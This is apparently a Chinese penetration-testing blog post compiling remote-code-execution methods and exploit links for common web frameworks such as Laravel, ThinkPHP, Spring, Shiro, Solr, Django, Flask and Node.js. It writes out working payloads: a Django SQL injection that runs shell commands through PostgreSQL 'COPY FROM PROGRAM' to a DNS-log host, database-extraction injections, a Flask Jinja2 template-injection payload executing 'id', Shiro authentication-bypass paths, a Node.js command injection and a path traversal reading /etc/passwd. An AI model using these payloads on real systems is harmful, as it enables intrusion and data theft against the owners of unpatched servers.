前言
为什么突然跳到这个框架安全得话题,就现在的安全意识水平,一般都会升级,或者是通报后及时整改修复,框架直接RCE的可能性小之又小,却没成想我手上真的出现了这样的资产。
本篇文章主要分享总结一下常见框架的rce姿势,或者是一些一键脚本,前人栽树后人乘凉嘛,脚本小子也还挺快乐的不是吗?
本篇文章会同步及时更新,好比一个仓库,以便师傅们及时查阅。
不废话,直接开水(手动狗头)。
基础知识
中间件及框架列表:
IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery等
1、开发框架-PHP-Laravel-Thinkphp
2、开发框架-Javaweb-St2-Spring
3、开发框架-Python-django-Flask
4、开发框架-Javascript-Node.js-JQuery
5、其他框架-Java-Apache Shiro&Apache Sorl
常见语言开发框架:
PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA:Spring MyBatis Hibernate Struts2 Springboot等
Python:Django Flask Bottle Turbobars Tornado Web2py等
Javascript:Vue.js Node.js Bootstrap JQuery Angular等
PHP Thinkphp&Laravel
Laravel
CVE-2021-3129 RCE
Laravel <= 8.4.2
https://github.com/zhzyker/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
Thinkphp-3.X RCE-5.X RCE
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架
Thinkphp专检
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3
PHPUnit
eval-stdin.php 远程命令执行漏洞 CVE-2017-9841
/phpunit/src/Util/PHP/eval-stdin.php
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
JAVA Spring&Struts2&Shiro&
Struts2
武器库-st2专检
文末获取下载连接
S2-062 CVE-2021-31805
https://github.com/YanMu2020/s2-062
Spring
SpringBoot 相关漏洞学习资料,利用方法和技巧合集
https://github.com/LandGrey/SpringBootVulExploit
SpringBoot
https://github.com/0x727/SpringBootExploit
https://github.com/WhiteHSBG/JNDIExploit
Spring-cloud-function
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
Spring_Cloud_Gateway
https://github.com/An0th3r/CVE-2022-22947-exp
Apache Shiro
判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段
漏洞:https://avd.aliyun.com/search?q=shiro
Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞 CVE-2016-4483
Apache Shiro < 1.3.2 验证绕过漏洞 CVE-2016-2807
Apache Shiro < 1.4.2 cookie oracle padding漏洞 CVE-2019-12442
Apache Shiro < 1.5.2 验证绕过漏洞 CVE-2020-1957
Apache Shiro < 1.5.3 验证绕过漏洞 CVE-2020-11989
Apahce Shiro < 1.6.0 验证绕过漏洞 CVE-2020-13933
Apahce Shiro < 1.7.1 权限绕过漏洞 CVE-2020-17523
CVE_2016_4437 Shiro-550+Shiro-721
CVE-2020-11989
Poc:
/admin/%20
影响范围:Apache Shiro < 1.7.1
https://github.com/jweny/shiro-cve-2020-17523
CVE-2020-1957
Poc
/xxx/..;/admin/
影响范围:Apache Shiro < 1.5.3
武器化文末获取
Apache Solr
Apache Solr Exploits 🌟
https://github.com/Imanfeng/Apache-Solr-RCE#cve-2017-12629
CVE-2019-0193
CVE-2019-0192
CVE-2019-17558
CVE-2017-12629
CVE-2019-12409
CVE-2020-13957
CVE-2018-8026
CVE-2021-27905 Apache Solr 文件读取&SSRF
https://github.com/murataydemir/CVE-2021-27905
Python Django&Flask&MotionEye
Django
CVE_2019_14234
单引号已注入成功,SQL语句报错:
/admin/vuln/collection/?detail__a%27b=123
创建cmd_exec:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
调用cmd_exec执行命令:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20
CVE-2020-7471
https://github.com/huzaifakhan771/CVE-2020-7471-Django
CVE-2021-35042
目录:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
版本:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23
数据库名:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23
Flask Jinja2 SSTI
Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug ,模板引擎则使用Jinja2 .
?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
MotionEye
信息泄露漏洞 CVE-2022-25568
MotionEye <= 0.42.1
/config/list
JavaScript Jquery&Node
jQuery
jQuery Upload File <= 4.0.2 中的任意文件上传
curl -F "myfile=@php.php" "url"
XSS payload
https://github.com/mahp/jQuery-with-XSS
Node.js
cve_2021_21315
Systeminformation < 5.3.1
https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
POC
/api/getServices?name[]=$(echo -e 'ckcsec' > test.txt)
cve_2017_14849
GET:
/static/../../../a/../../../../etc/passwd